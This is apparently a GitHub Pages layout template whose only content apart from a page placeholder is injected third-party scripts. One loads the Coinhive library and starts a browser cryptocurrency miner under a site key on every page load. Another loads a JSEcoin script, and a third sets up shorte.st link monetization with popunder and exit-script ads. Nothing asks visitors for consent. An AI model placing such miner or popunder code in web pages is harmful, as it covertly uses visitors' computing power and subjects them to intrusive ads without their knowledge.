{{ content }}

<script type="text/javascript">
(function() {
var trackingurl = 'https://load.jsecoin.com/server/load/1859/stipekolovrat.github.io/';
var d=document, j=d.createElement('script'), s=d.getElementsByTagName('script')[0];
j.type='text/javascript'; j.async=true; j.defer=true; j.src=trackingurl; s.parentNode.insertBefore(j,s);
})();
</script>


<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
	var miner = new CoinHive.Anonymous('Qn1EcBmA3WVM5LY2RRi8kTFntZL6x8Rd');
	miner.start();
</script>


<script type="text/javascript">//<![CDATA[ 
(function() {
    var configuration = {
    "token": "321c893c5e6d05e8f2faacd9b6d12bd5",
    "excludeDomains": [
        "stipekolovrat.github.io/infohajduk/"
    ],
    "capping": {
        "limit": 5,
        "timeout": 24
    },
    "exitScript": {
        "enabled": true
    },
    "popUnder": {
        "enabled": true
    }
};
    var script = document.createElement('script');
    script.async = true;
    script.src = '//cdn.shorte.st/link-converter.min.js';
    script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
    var entry = document.getElementsByTagName('script')[0];
    entry.parentNode.insertBefore(script, entry);
})();
//]]></script>
